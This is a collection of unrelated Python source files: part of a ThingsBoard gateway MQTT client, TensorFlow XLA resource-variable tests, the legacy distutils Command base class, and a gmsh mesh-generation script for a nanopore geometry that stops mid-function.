info = self._client.publish(topic=GATEWAY_MAIN_TOPIC + "connect", payload=dumps({"device": device_name, "type": device_type}),
qos=self.quality_of_service)
self.__connected_devices.add(device_name)
# if self.gateway:
# self.gateway.on_device_connected(device_name, self.__devices_server_side_rpc_request_handler)
log.debug("Connected device %s", device_name)
return info
def gw_disconnect_device(self, device_name):
info = self._client.publish(topic=GATEWAY_MAIN_TOPIC + "disconnect", payload=dumps({"device": device_name}),
qos=self.quality_of_service)
if device_name in self.__connected_devices:
self.__connected_devices.remove(device_name)
# if self.gateway:
# self.gateway.on_device_disconnected(self, device_name)
log.debug("Disconnected device %s", device_name)
return info
def gw_subscribe_to_all_attributes(self, callback):
return self.gw_subscribe_to_attribute("*", "*", callback)
def gw_subscribe_to_all_device_attributes(self, device, callback):
return self.gw_subscribe_to_attribute(device, "*", callback)
def gw_subscribe_to_attribute(self, device, attribute, callback):
if device not in self.__connected_devices:
log.error("Device %s is not connected", device)
return False
with self._lock:
self.__max_sub_id += 1
key = device + "|" + attribute
if key not in self.__sub_dict:
self.__sub_dict.update({key: {device: callback}})
else:
self.__sub_dict[key].update({device: callback})
log.info("Subscribed to %s with id %i for device %s", key, self.__max_sub_id, device)
return self.__max_sub_id
def gw_unsubscribe(self, subscription_id):
with self._lock:
for attribute in self.__sub_dict:
if self.__sub_dict[attribute].get(subscription_id):
del self.__sub_dict[attribute][subscription_id]
log.info("Unsubscribed from %s, subscription id %r", attribute, subscription_id)
if subscription_id == '*':
self.__sub_dict = {}
def gw_set_server_side_rpc_request_handler(self, handler):
self.devices_server_side_rpc_request_handler = handler
def gw_send_rpc_reply(self, device, req_id, resp, quality_of_service):
if quality_of_service is None:
quality_of_service = self.quality_of_service
if quality_of_service not in (0, 1):
log.error("Quality of service (qos) value must be 0 or 1")
return None
info = self._client.publish(GATEWAY_RPC_TOPIC,
dumps({"device": device, "id": req_id, "data": resp}),
qos=quality_of_service)
return info
def gw_claim(self, device_name, secret_key, duration, claiming_request=None):
if claiming_request is None:
claiming_request = {
device_name: {
"secretKey": secret_key,
"durationMs": duration
}
}
info = self._client.publish(GATEWAY_CLAIMING_TOPIC, dumps(claiming_request), qos=self.quality_of_service)
return info
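# A minimal usage sketch for TBGatewayMqttClient, assuming a reachable
# ThingsBoard instance at 'thingsboard.example.com' and a valid gateway access
# token (both hypothetical); connect()/disconnect() are inherited from
# TBDeviceMqttClient.
#
# gateway = TBGatewayMqttClient("thingsboard.example.com", 1883, token="GATEWAY_TOKEN")
# gateway.connect()
# gateway.gw_connect_device("Sensor A", "default")
# gateway.gw_send_telemetry("Sensor A", {"ts": int(time.time() * 1000),
#                                        "values": {"temperature": 42.1}})
# sub_id = gateway.gw_subscribe_to_attribute("Sensor A", "targetTemp",
#                                            lambda content: log.info(content))
# gateway.gw_disconnect_device("Sensor A")
# gateway.disconnect()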
|
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for reading and writing variables."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests.xla_test import XLATestCase
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training.gradient_descent import GradientDescentOptimizer
class VariableOpsTest(XLATestCase):
"""Test cases for resource variable operators."""
def testOneWriteOneOutput(self):
# Regression test for a bug where computations with one non-constant
# output and one variable update were mishandled.
for dtype in self.numeric_types:
init = np.array([[1, 2], [3, 4]], dtype=dtype)
with self.test_session() as sess, self.test_scope():
v = resource_variable_ops.ResourceVariable(init)
sess.run(variables.variables_initializer([v]))
p = array_ops.placeholder(dtype)
x = v.assign_add(p)
with ops.control_dependencies([x]):
y = v.read_value()
self.assertAllClose(np.array([[2, 3], [4, 5]], dtype=dtype),
sess.run(y, {p: 1}))
def testSparseRead0DIndices(self):
for dtype in self.numeric_types:
init = np.array([[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11]], dtype=dtype)
with self.test_session() as sess, self.test_scope():
v = resource_variable_ops.ResourceVariable(init)
sess.run(variables.variables_initializer([v]))
x = v.sparse_read(2)
self.assertAllClose(np.array([8, 9, 10, 11], dtype=dtype), sess.run(x))
def testSparseRead1DIndices(self):
for dtype in self.numeric_types:
init = np.array([[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11]], dtype=dtype)
with self.test_session() as sess, self.test_scope():
v = resource_variable_ops.ResourceVariable(init)
sess.run(variables.variables_initializer([v]))
x = v.sparse_read([2, 1])
self.assertAllClose(
np.array([[8, 9, 10, 11], [4, 5, 6, 7]], dtype=dtype), sess.run(x))
def testSparseRead2DIndices(self):
for dtype in self.numeric_types:
init = np.array([[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11]], dtype=dtype)
with self.test_session() as sess, self.test_scope():
v = resource_variable_ops.ResourceVariable(init)
sess.run(variables.variables_initializer([v]))
x = v.sparse_read([[2, 1], [0, 2]])
self.assertAllClose(
np.array(
[[[8, 9, 10, 11], [4, 5, 6, 7]], [[0, 1, 2, 3], [8, 9, 10,
11]]],
dtype=dtype), sess.run(x))
def testSparseRead2DIndices3DTensor(self):
for dtype in self.numeric_types:
init = np.array(
[[[0, 1, 2], [3, 4, 5]], [[10, 11, 12], [13, 14, 15]],
[[20, 21, 22], [23, 24, 25]], [[30, 31, 32], [33, 34, 35]]],
dtype=dtype)
with self.test_session() as sess, self.test_scope():
v = resource_variable_ops.ResourceVariable(init)
sess.run(variables.variables_initializer([v]))
x = v.sparse_read([[2, 1], [3, 0]])
self.assertAllClose(
np.array(
[[[[20, 21, 22], [23, 24, 25]], [[10, 11, 12], [13, 14, 15]]],
[[[30, 31, 32], [33, 34, 35]], [[0, 1, 2], [3, 4, 5]]]],
dtype=dtype), sess.run(x))
def testReadWrite(self):
"""Tests initialization, reading, and writing a resource variable."""
with self.test_session() as session:
with self.test_scope():
with variable_scope.variable_scope("ascope", use_resource=True):
x = variable_scope.get_variable(
"x",
shape=[],
dtype=dtypes.float32,
initializer=init_ops.constant_initializer(2))
a = x.read_value()
with ops.control_dependencies([a]):
b = state_ops.assign(x, 47)
with ops.control_dependencies([b]):
c = x.read_value()
with ops.control_dependencies([c]):
d = state_ops.assign_add(x, 3)
with ops.control_dependencies([d]):
e = x.read_value()
session.run(variables.global_variables_initializer())
v1, v2, v3 = session.run([a, c, e])
self.assertAllClose(2.0, v1)
self.assertAllClose(47.0, v2)
self.assertAllClose(50.0, v3)
def testTraining(self):
"""Tests a gradient descent step for a simple model."""
with self.test_session() as session:
with self.test_scope():
with variable_scope.variable_scope("ascope", use_resource=True):
w = variable_scope.get_variable(
"w",
shape=[4, 2],
dtype=dtypes.float32,
initializer=init_ops.constant_initializer(
np.array([[1, 2], [3, 4], [5, 6], [7, 8]], dtype=np.float32)))
b = variable_scope.get_variable(
"b",
shape=[2],
dtype=dtypes.float32,
initializer=init_ops.constant_initializer(
np.array([2, 3], dtype=np.float32)))
x = array_ops.placeholder(dtypes.float32, shape=[1, 4])
y = math_ops.matmul(x, w) + b
loss = math_ops.reduce_sum(y)
optimizer = GradientDescentOptimizer(0.1)
train = optimizer.minimize(loss)
session.run(variables.global_variables_initializer())
session.run(train, {x: np.array([[7, 3, 5, 9]], dtype=np.float32)})
vw, vb = session.run([w, b])
self.assertAllClose(
np.array(
[[0.3, 1.3], [2.7, 3.7], [4.5, 5.5], [6.1, 7.1]],
dtype=np.float32),
vw,
rtol=1e-4)
self.assertAllClose(np.array([1.9, 2.9], dtype=np.float32), vb, rtol=1e-4)
class StridedSliceAssignChecker(object):
"""Compares the results of a slice assignment using Tensorflow and numpy."""
def __init__(self, test, x, dtype):
self.dtype = dtype
self.test = test
self.x_np = np.array(x).astype(dtype)
def __setitem__(self, index, value):
value = np.array(value).astype(self.dtype)
with self.test.test_session() as sess, self.test.test_scope():
x = constant_op.constant(self.x_np, dtype=self.dtype)
var = resource_variable_ops.ResourceVariable(x)
sess.run(variables.variables_initializer([var]))
val = sess.run(var[index].assign(value))
# val_copy is used to check that tf.assign works equivalently to the
# assign method above.
val_copy = sess.run(state_ops.assign(var[index], value))
valnp = np.copy(self.x_np)
valnp[index] = np.array(value)
self.test.assertAllEqual(val, valnp)
self.test.assertAllEqual(val_copy, valnp)
class SliceAssignTest(XLATestCase):
def testSliceAssign(self):
for dtype in self.numeric_types:
checker = StridedSliceAssignChecker(self, [[1, 2, 3], [4, 5, 6]],
dtype=dtype)
# No-op assignment
checker[:] = [[10, 20, 30], [40, 50, 60]]
# Checks trivial (1,1) shape tensor
checker[1:2, 1:2] = [[66]]
# shrink shape changes
checker[1:2, 1] = [66]
checker[1, 1:2] = [66]
checker[1, 1] = 66
# newaxis shape changes
checker[:, None, :] = [[[10, 20, 30]], [[40, 50, 50]]]
# shrink and newaxis
checker[None, None, 0, 0:1] = [[[99]]]
# Non unit strides
checker[::1, 1::-1] = [[3, 33], [4, 44]]
# degenerate interval
checker[8:10, 0] = []
checker[8:10, 8:10] = [[]]
# Assign vector to scalar (rank-0) using newaxis
checker2 = StridedSliceAssignChecker(self, 222, dtype=dtype)
checker2[()] = 6 # no indices
checker2[...] = 6 # ellipsis
checker2[None] = [6] # new axis
def testUninitialized(self):
with self.assertRaisesRegexp(errors.InvalidArgumentError,
"uninitialized variable"):
with self.test_session() as sess, self.test_scope():
v = resource_variable_ops.ResourceVariable([1, 2])
sess.run(v[:].assign([1, 2]))
if __name__ == "__main__":
googletest.main()
|
|
"""distutils.cmd
Provides the Command class, the base class for the command classes
in the distutils.command package.
"""
# created 2000/04/03, Greg Ward
# (extricated from core.py; actually dates back to the beginning)
__revision__ = "$Id: cmd.py,v 1.27 2001/03/22 03:48:31 akuchling Exp $"
import sys, os, string, re
from types import *
from distutils.errors import *
from distutils import util, dir_util, file_util, archive_util, dep_util
class Command:
"""Abstract base class for defining command classes, the "worker bees"
of the Distutils. A useful analogy for command classes is to think of
them as subroutines with local variables called "options". The options
are "declared" in 'initialize_options()' and "defined" (given their
final values, aka "finalized") in 'finalize_options()', both of which
must be defined by every command class. The distinction between the
two is necessary because option values might come from the outside
world (command line, config file, ...), and any options dependent on
other options must be computed *after* these outside influences have
been processed -- hence 'finalize_options()'. The "body" of the
subroutine, where it does all its work based on the values of its
options, is the 'run()' method, which must also be implemented by every
command class.
"""
# 'sub_commands' formalizes the notion of a "family" of commands,
# eg. "install" as the parent with sub-commands "install_lib",
# "install_headers", etc. The parent of a family of commands
# defines 'sub_commands' as a class attribute; it's a list of
# (command_name : string, predicate : unbound_method | string | None)
# tuples, where 'predicate' is a method of the parent command that
# determines whether the corresponding command is applicable in the
# current situation. (Eg. "install_headers" is only applicable if
# we have any C header files to install.) If 'predicate' is None,
# that command is always applicable.
#
# 'sub_commands' is usually defined at the *end* of a class, because
# predicates can be unbound methods, so they must already have been
# defined. The canonical example is the "install" command.
sub_commands = []
# -- Creation/initialization methods -------------------------------
def __init__ (self, dist):
"""Create and initialize a new Command object. Most importantly,
invokes the 'initialize_options()' method, which is the real
initializer and depends on the actual command being
instantiated.
"""
# late import because of mutual dependence between these classes
from distutils.dist import Distribution
if not isinstance(dist, Distribution):
raise TypeError, "dist must be a Distribution instance"
if self.__class__ is Command:
raise RuntimeError, "Command is an abstract class"
self.distribution = dist
self.initialize_options()
# Per-command versions of the global flags, so that the user can
# customize Distutils' behaviour command-by-command and let some
# commands fallback on the Distribution's behaviour. None means
# "not defined, check self.distribution's copy", while 0 or 1 mean
# false and true (duh). Note that this means figuring out the real
# value of each flag is a touch complicated -- hence "self.verbose"
# (etc.) will be handled by __getattr__, below.
self._verbose = None
self._dry_run = None
# Some commands define a 'self.force' option to ignore file
# timestamps, but methods defined *here* assume that
# 'self.force' exists for all commands. So define it here
# just to be safe.
self.force = None
# The 'help' flag is just used for command-line parsing, so
# none of that complicated bureaucracy is needed.
self.help = 0
# 'finalized' records whether or not 'finalize_options()' has been
# called. 'finalize_options()' itself should not pay attention to
# this flag: it is the business of 'ensure_finalized()', which
# always calls 'finalize_options()', to respect/update it.
self.finalized = 0
# __init__ ()
def __getattr__ (self, attr):
if attr in ('verbose', 'dry_run'):
myval = getattr(self, "_" + attr)
if myval is None:
return getattr(self.distribution, attr)
else:
return myval
else:
raise AttributeError, attr
def ensure_finalized (self):
if not self.finalized:
self.finalize_options()
self.finalized = 1
# Subclasses must define:
# initialize_options()
# provide default values for all options; may be customized by
# setup script, by options from config file(s), or by command-line
# options
# finalize_options()
# decide on the final values for all options; this is called
# after all possible intervention from the outside world
# (command-line, option file, etc.) has been processed
# run()
# run the command: do whatever it is we're here to do,
# controlled by the command's various option values
def initialize_options (self):
"""Set default values for all the options that this command
supports. Note that these defaults may be overridden by other
commands, by the setup script, by config files, or by the
command-line. Thus, this is not the place to code dependencies
between options; generally, 'initialize_options()' implementations
are just a bunch of "self.foo = None" assignments.
This method must be implemented by all command classes.
"""
raise RuntimeError, \
"abstract method -- subclass %s must override" % self.__class__
def finalize_options (self):
"""Set final values for all the options that this command supports.
This is always called as late as possible, ie. after any option
assignments from the command-line or from other commands have been
done. Thus, this is the place to code option dependencies: if
'foo' depends on 'bar', then it is safe to set 'foo' from 'bar' as
long as 'foo' still has the same value it was assigned in
'initialize_options()'.
This method must be implemented by all command classes.
"""
raise RuntimeError, \
"abstract method -- subclass %s must override" % self.__class__
def dump_options (self, header=None, indent=""):
from distutils.fancy_getopt import longopt_xlate
if header is None:
header = "command options for '%s':" % self.get_command_name()
print indent + header
indent = indent + " "
for (option, _, _) in self.user_options:
option = string.translate(option, longopt_xlate)
if option[-1] == "=":
option = option[:-1]
value = getattr(self, option)
print indent + "%s = %s" % (option, value)
def run (self):
"""A command's raison d'etre: carry out the action it exists to
perform, controlled by the options initialized in
'initialize_options()', customized by other commands, the setup
script, the command-line, and config files, and finalized in
'finalize_options()'. All terminal output and filesystem
interaction should be done by 'run()'.
This method must be implemented by all command classes.
"""
raise RuntimeError, \
"abstract method -- subclass %s must override" % self.__class__
def announce (self, msg, level=1):
"""If the current verbosity level is of greater than or equal to
'level' print 'msg' to stdout.
"""
if self.verbose >= level:
print msg
def debug_print (self, msg):
"""Print 'msg' to stdout if the global DEBUG (taken from the
DISTUTILS_DEBUG environment variable) flag is true.
"""
from distutils.core import DEBUG
if DEBUG:
print msg
# -- Option validation methods -------------------------------------
# (these are very handy in writing the 'finalize_options()' method)
#
# NB. the general philosophy here is to ensure that a particular option
# value meets certain type and value constraints. If not, we try to
# force it into conformance (eg. if we expect a list but have a string,
# split the string on comma and/or whitespace). If we can't force the
# option into conformance, raise DistutilsOptionError. Thus, command
# classes need do nothing more than (eg.)
# self.ensure_string_list('foo')
# and they can be guaranteed that thereafter, self.foo will be
# a list of strings.
def _ensure_stringlike (self, option, what, default=None):
val = getattr(self, option)
if val is None:
setattr(self, option, default)
return default
elif type(val) is not StringType:
raise DistutilsOptionError, \
"'%s' must be a %s (got `%s`)" % (option, what, val)
return val
def ensure_string (self, option, default=None):
"""Ensure that 'option' is a string; if not defined, set it to
'default'.
"""
self._ensure_stringlike(option, "string", default)
def ensure_string_list (self, option):
"""Ensure that 'option' is a list of strings. If 'option' is
currently a string, we split it either on /,\s*/ or /\s+/, so
"foo bar baz", "foo,bar,baz", and "foo, bar baz" all become
["foo", "bar", "baz"].
"""
val = getattr(self, option)
if val is None:
return
elif type(val) is StringType:
setattr(self, option, re.split(r',\s*|\s+', val))
else:
if type(val) is ListType:
types = map(type, val)
ok = (types == [StringType] * len(val))
else:
ok = 0
if not ok:
raise DistutilsOptionError, \
"'%s' must be a list of strings (got %s)" % \
(option, `val`)
def _ensure_tested_string (self, option, tester,
what, error_fmt, default=None):
val = self._ensure_stringlike(option, what, default)
if val is not None and not tester(val):
raise DistutilsOptionError, \
("error in '%s' option: " + error_fmt) % (option, val)
def ensure_filename (self, option):
"""Ensure that 'option' is the name of an existing file."""
self._ensure_tested_string(option, os.path.isfile,
"filename",
"'%s' does not exist or is not a file")
def ensure_dirname (self, option):
self._ensure_tested_string(option, os.path.isdir,
"directory name",
"'%s' does not exist or is not a directory")
# -- Convenience methods for commands ------------------------------
def get_command_name (self):
if hasattr(self, 'command_name'):
return self.command_name
else:
return self.__class__.__name__
def set_undefined_options (self, src_cmd, *option_pairs):
"""Set the values of any "undefined" options from corresponding
option values in some other command object. "Undefined" here means
"is None", which is the convention used to indicate that an option
has not been changed between 'initialize_options()' and
'finalize_options()'. Usually called from 'finalize_options()' for
options that depend on some other command rather than another
option of the same command. 'src_cmd' is the other command from
which option values will be taken (a command object will be created
for it if necessary); the remaining arguments are
'(src_option,dst_option)' tuples which mean "take the value of
'src_option' in the 'src_cmd' command object, and copy it to
'dst_option' in the current command object".
"""
# Option_pairs: list of (src_option, dst_option) tuples
src_cmd_obj = self.distribution.get_command_obj(src_cmd)
src_cmd_obj.ensure_finalized()
for (src_option, dst_option) in option_pairs:
if getattr(self, dst_option) is None:
setattr(self, dst_option,
getattr(src_cmd_obj, src_option))
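# An illustrative sketch (not actual distutils code): a hypothetical
# 'install_docs' command could inherit its destination from the 'install'
# command like so, from inside its own finalize_options():
#     self.set_undefined_options('install', ('install_base', 'install_dir'))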
def get_finalized_command (self, command, create=1):
"""Wrapper around Distribution's 'get_command_obj()' method: find
(create if necessary and 'create' is true) the command object for
'command', call its 'ensure_finalized()' method, and return the
finalized command object.
"""
cmd_obj = self.distribution.get_command_obj(command, create)
cmd_obj.ensure_finalized()
return cmd_obj
# XXX rename to 'get_reinitialized_command()'? (should do the
# same in dist.py, if so)
def reinitialize_command (self, command, reinit_subcommands=0):
return self.distribution.reinitialize_command(
command, reinit_subcommands)
def run_command (self, command):
"""Run some other command: uses the 'run_command()' method of
Distribution, which creates and finalizes the command object if
necessary and then invokes its 'run()' method.
"""
self.distribution.run_command(command)
def get_sub_commands (self):
"""Determine the sub-commands that are relevant in the current
distribution (i.e., that need to be run). This is based on the
'sub_commands' class attribute: each tuple in that list may include
a method that we call to determine if the subcommand needs to be
run for the current distribution. Return a list of command names.
"""
commands = []
for (cmd_name, method) in self.sub_commands:
if method is None or method(self):
commands.append(cmd_name)
return commands
# -- External world manipulation -----------------------------------
def warn (self, msg):
sys.stderr.write("warning: %s: %s\n" %
(self.get_command_name(), msg))
def execute (self, func, args, msg=None, level=1):
util.execute(func, args, msg, self.verbose >= level, self.dry_run)
def mkpath (self, name, mode=0777):
dir_util.mkpath(name, mode,
self.verbose, self.dry_run)
def copy_file (self, infile, outfile,
preserve_mode=1, preserve_times=1, link=None, level=1):
"""Copy a file respecting verbose, dry-run and force flags. (The
former two default to whatever is in the Distribution object, and
the latter defaults to false for commands that don't define it.)"""
return file_util.copy_file(
infile, outfile,
preserve_mode, preserve_times,
not self.force,
link,
self.verbose >= level,
self.dry_run)
def copy_tree (self, infile, outfile,
preserve_mode=1, preserve_times=1, preserve_symlinks=0,
level=1):
"""Copy an entire directory tree respecting verbose, dry-run,
and force flags.
"""
return dir_util.copy_tree(
infile, outfile,
preserve_mode,preserve_times,preserve_symlinks,
not self.force,
self.verbose >= level,
self.dry_run)
def move_file (self, src, dst, level=1):
"""Move a file respecting verbose and dry-run flags."""
return file_util.move_file(src, dst,
self.verbose >= level,
self.dry_run)
def spawn (self, cmd, search_path=1, level=1):
"""Spawn an external command respecting verbose and dry-run flags."""
from distutils.spawn import spawn
spawn(cmd, search_path,
self.verbose >= level,
self.dry_run)
def make_archive (self, base_name, format,
root_dir=None, base_dir=None):
return archive_util.make_archive(
base_name, format, root_dir, base_dir,
self.verbose, self.dry_run)
def make_file (self, infiles, outfile, func, args,
exec_msg=None, skip_msg=None, level=1):
"""Special case of 'execute()' for operations that process one or
more input files and generate one output file. Works just like
'execute()', except the operation is skipped and a different
message printed if 'outfile' already exists and is newer than all
files listed in 'infiles'. If the command defines 'self.force'
and it is true, then the command is run unconditionally -- no
timestamp checks are done.
"""
if exec_msg is None:
exec_msg = "generating %s from %s" % \
(outfile, string.join(infiles, ', '))
if skip_msg is None:
skip_msg = "skipping %s (inputs unchanged)" % outfile
# Allow 'infiles' to be a single string
if type(infiles) is StringType:
infiles = (infiles,)
elif type(infiles) not in (ListType, TupleType):
raise TypeError, \
"'infiles' must be a string, or a list or tuple of strings"
# If 'outfile' must be regenerated (either because it doesn't
# exist, is out-of-date, or the 'force' flag is true) then
# perform the action that presumably regenerates it
if self.force or dep_util.newer_group (infiles, outfile):
self.execute(func, args, exec_msg, level)
# Otherwise, print the "skip" message
else:
self.announce(skip_msg, level)
# make_file ()
# class Command
# XXX 'install_misc' class not currently used -- it was the base class for
# both 'install_scripts' and 'install_data', but they outgrew it. It might
# still be useful for 'install_headers', though, so I'm keeping it around
# for the time being.
class install_misc (Command):
"""Common base class for installing some files in a subdirectory.
Currently used by install_data and install_scripts.
"""
user_options = [('install-dir=', 'd', "directory to install the files to")]
def initialize_options (self):
self.install_dir = None
self.outfiles = []
def _install_dir_from (self, dirname):
self.set_undefined_options('install', (dirname, 'install_dir'))
def _copy_files (self, filelist):
self.outfiles = []
if not filelist:
return
self.mkpath(self.install_dir)
for f in filelist:
self.copy_file(f, self.install_dir)
self.outfiles.append(os.path.join(self.install_dir, f))
def get_outputs (self):
return self.outfiles
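# An illustrative sketch (not part of distutils) of the initialize_options()/
# finalize_options()/run() contract described in the Command docstring; the
# command name and its option are hypothetical.
#
# class clean_docs (Command):
#     description = "remove generated documentation"
#     user_options = [('doc-dir=', 'd', "directory holding generated docs")]
#
#     def initialize_options (self):
#         # just declare the option -- no dependencies between options here
#         self.doc_dir = None
#
#     def finalize_options (self):
#         # resolve option dependencies as late as possible
#         if self.doc_dir is None:
#             self.doc_dir = os.path.join('build', 'docs')
#
#     def run (self):
#         self.execute(dir_util.remove_tree, (self.doc_dir,),
#                      "removing %s" % self.doc_dir)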
if __name__ == "__main__":
print "ok"
|
|
"""
python script that generates mesh for Wei et al geometry
"""
import numpy
import nanopores.py4gmsh.basic
import nanopores.py4gmsh.extra
from nanopores.py4gmsh import *
from params_geo import *
from warnings import warn
def get_geo(x0 = None, **params):
"""
writes a 3d geo file for an axisymmetric geometry for Wei et al
'Stochastic sensing ...'
_________
| |
| |
| _____|
| \____|
| |
| |
|________| *rotated around z-axis
"""
reload(nanopores.py4gmsh.basic)
reload(nanopores.py4gmsh.extra)
globals().update(params)
# define additional geo variables
# mesh generation should also work for no SAM layer
if lsam is None or lsam < tolc:
sam = None
else:
sam = True
l0 = lau +lsin +lsam
angle2 = angle/2.0
tan = numpy.tan(angle2*numpy.pi/180)
sin = numpy.sin(angle2*numpy.pi/180)
cos = numpy.cos(angle2*numpy.pi/180)
r1 = r0 + l0*tan
rsam = r0 + lsam/cos
rsin = r0 + lsam/cos + rlau
Rx = R
X_Fluid_up = numpy.array([
[0, 0, Rz],
[Rx, 0, Rz],
[Rx, 0, l0/2],
])
X_Fluid_low = numpy.array([
[Rx, 0, -l0/2],
[Rx, 0, -Rz],
[0, 0, -Rz],
])
X_Fluid_ctr = numpy.array([
[0, 0, -l0/2],
[0, 0, -l0/6],
[0, 0, +l0/6],
[0, 0, +l0/2],
])
X_SAM_ctr = numpy.array([
[r1, 0, l0/2],
[(2*r1+r0)/3, 0, l0/6],
[(r1+2*r0)/3, 0, -l0/6],
[r0, 0, -l0/2],
])
X_SiN = numpy.array([
[Rx, 0, -(l0/2-lsin)],
[rsin +tan*lsin, 0, -l0/2 +lsin],
[rsin, 0, -l0/2],
])
p_SAM = [Point(x, lcCenter) for x in X_SAM_ctr[:-1]]
p_SAM.append(Point(X_SAM_ctr[-1],lcCenter/5.0))
p_SiN = [Point(x, lcOuter) for x in X_SiN]
p_Fluid_up = [Point(x, lcOuter) for x in X_Fluid_up]
p_Fluid_low = [Point(x, lcOuter) for x in X_Fluid_low]
p_Fluid_ctr = [Point(x, lcCenter) for x in X_Fluid_ctr]
if sam is None:
p_Au = []
else:
X_Au = numpy.array([
[Rx, 0, -lsam +l0/2],
[rsam -tan*(lsam-l0), 0, -lsam + l0/2],
[rsam, 0, -l0/2],
])
p_Au = [Point(X_Au[0], lcOuter)]
p_Au.extend([Point(x, lcCenter) for x in X_Au[1:]])
# Group all fluid points into list
p_Fluid = p_Fluid_up + p_SAM
if sam is not None:
p_Fluid.append(p_Au[-1])
p_Fluid.append(p_SiN[-1])
p_Fluid.extend(p_Fluid_low)
geo_cs_str = "no crosssectional surface"
cs_pop_i = None
insert_ind = 0
Comment(' integrate crosssectional lines in fluid surface ')
z_CrossS = [X_Fluid_ctr[k][2] for k in reversed(range(len(X_Fluid_ctr)))]
e_CrossS = [Line(p_Fluid_ctr[k], p_SAM[len(p_SAM)-1-k]) for k in reversed(range(len(p_Fluid_ctr)))]
if x0 is not None and (x0[0]**2 + x0[1]**2 <= r1**2):
geo_cs_list = ["top", "center top", "center bottom", "bottom"]
# Determine position of molecule for correct geometry
for i in range(len(z_CrossS)):
if abs(x0[2] - z_CrossS[i]) < rMolecule:
cs_pop_i = i
if cs_pop_i is not None:
geo_cs_str = geo_cs_list[cs_pop_i]
e_CrossS.pop(cs_pop_i)
# Create Line Loops from the points sitting on the line
Comment(' Connect all outer Fluid points ')
e_Fluid = [Line(p_Fluid[k], p_Fluid[k+1]) for k in range(len(p_Fluid)-1)]
Comment(' Connect outer Membrane points ')
if sam is not None:
p_list_mem = [p_Fluid_low[0], p_SiN[0], p_Au[0], p_Fluid_up[-1]]
else:
p_list_mem = [p_Fluid_low[0], p_SiN[0], p_Fluid_up[-1]]
e_Membrane_ext = [Line(p_list_mem[k], p_list_mem[k+1]) \
for k in range(len(p_list_mem)-1)]
e_Membrane_in = []
Comment(' Integrate Membrane material interfaces into membrane')
if sam is not None:
e_Au = [Line(p_Au[k], p_Au[k+1]) for k in range(len(p_Au)-1)]
e_Membrane_in.extend(e_Au)
e_SiN = [Line(p_SiN[k], p_SiN[k+1]) for k in range(len(p_SiN)-1)]
e_Membrane_in.extend(e_SiN)
edges_to_rot = [e_Fluid, e_Membrane_ext, e_Membrane_in, e_CrossS]
rot_axis = [0.0, 0.0, 1.0]
point_on_rot_axis = [0.0, 0.0, 0.0]
surfs = []
n_rot = 4
rot_angle = '2*Pi/%f' %n_rot
n_e = len(edges_to_rot)
n_e_i = [len(edges_to_rot[i]) for i in range(n_e)]
for i in range(n_e):
surfs_i = []
Comment('Extrude in 4 steps by rot_angle %s around z-axis.' %rot_angle)
previous = edges_to_rot[i]
for j in range(n_rot):
Comment('Step %s' % (j+1))
for k in range(len(previous)):
name = Extrude('Line{%s}' % previous[k],
rotation_axis=rot_axis,
point_on_axis=point_on_rot_axis,
angle=rot_angle
)
surfs_i.append(name + '[1]')
previous[k] = name + '[0]'
surfs.append(surfs_i)
surfs_Fluid = surfs[0][:]
sl_Fluid = SurfaceLoop(surfs_Fluid)
if x0 is None:
vol_Fluid = Volume(sl_Fluid)
else:
Comment('Add molecule ball')
Molecule = add_ball(numpy.asarray(x0), rMolecule, lcMolecule,
with_volume=True, holes=None, label=None
)
sl_Fluid_Molecule = Array([sl_Fluid] + [Molecule[1]])
vol_Fluid = Volume(sl_Fluid_Molecule)
# Molecule[0]->Volume, Molecule[1]->surface loop, Molecule[2]->surfs
vol_Molecule = Molecule[0]
Comment(' Integrate crosssections into fluid')
surfs_CrossS = surfs[-1]
raw_code(['Surface{%s} In Volume{%s};' %(surfs_CrossS[k], vol_Fluid) \
for k in range(len(surfs_CrossS))])
Comment(' Add membrane')
surfs_Membrane = surfs[1][:]
n_Membrane_Fluid = len(p_Fluid_up+p_SAM)-1
for k in range(n_Membrane_Fluid):
surfs_Membrane.extend(surfs[0][len(p_Fluid_up)+k-1::n_e_i[0]])
sl_Membrane = SurfaceLoop(surfs_Membrane)
vol_Membrane = Volume(sl_Membrane)
Comment(' Integrate membrane interfaces into membrane')
surfs_MembraneIn = surfs[-2]
raw_code(['Surface{%s} In Volume{%s};' %(surfs_MembraneIn[k], vol_Membrane) \
for k in range(len(surfs_MembraneIn))])
if moleculeblayer and x0 is not None:
moleculeblayer_list = Molecule[2]
else:
moleculeblayer_list = []
if membraneblayer:
n_bl_start = len(surfs[1])+1*n_rot
#numbers of surfaces with a boundary layer: 4, or if sam 5
num_faces = (4 if not sam else 5)
membraneblayer_list = surfs_Membrane[n_bl_start:n_bl_start+num_faces*n_rot]
else:
membraneblayer_list = []
blayer_list = moleculeblayer_list + membraneblayer_list
if blayer_list:
blayer = BoundaryLayer(
edges_list=None, faces_list=blayer_list,
hfar=lcOuter, hwall_n=lcCenter*0.1, hwall_t=lcCenter*0.5,
thickness=1, ratio=2)
field_list = [blayer,]
raw_code(['bfield = newf;'])
raw_code(['Field[bfield] = Min;'])
raw_code(['Field[bfield].FieldsList = {%s};' %(','.join(field_list))])
# Apply the boundary-layer mesh size field
raw_code(['Background Field = bfield;'])
# to disable question dialogs
raw_code(['General.ExpertMode = 1;'])
# 3D mesh algorithm (1=Delaunay, 4=Frontal, 5=Frontal Delaunay, 6=FrontalHex, 7=MMG3D, 9=R-tree), default = 1
#raw_code(['Mesh.Algorithm3D = 1'])
